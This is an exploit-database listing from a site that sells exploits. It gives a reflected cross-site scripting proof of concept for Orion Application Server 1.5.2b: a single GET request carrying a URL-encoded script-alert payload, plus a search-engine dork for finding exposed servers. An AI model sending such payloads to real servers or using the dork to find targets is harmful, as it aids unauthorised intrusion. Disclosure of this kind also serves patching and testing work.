[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Orion Application Server 1.5.2b Cross Site Scripting Vulnerability

Author
Pablo Rebolini
Risk
[
Security Risk High
]
0day-ID
0day-ID-34815
Category
web applications
Date add
11-08-2020
Platform
multiple
# Orion Application Server - Cross Site Scripting
#
# Tested on: Orion Application Server 1.5.2b

# Date: Ago 09, 2020
# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>

# Cross Site Scripting
# Poc:
  GET http://x.x.x.x/%3Cscript%3Ealert(%22xss'ed%22)%3C/script%3E

# Dork: "Orion Application Server" "up and running"

#  0day.today [2024-11-16]  #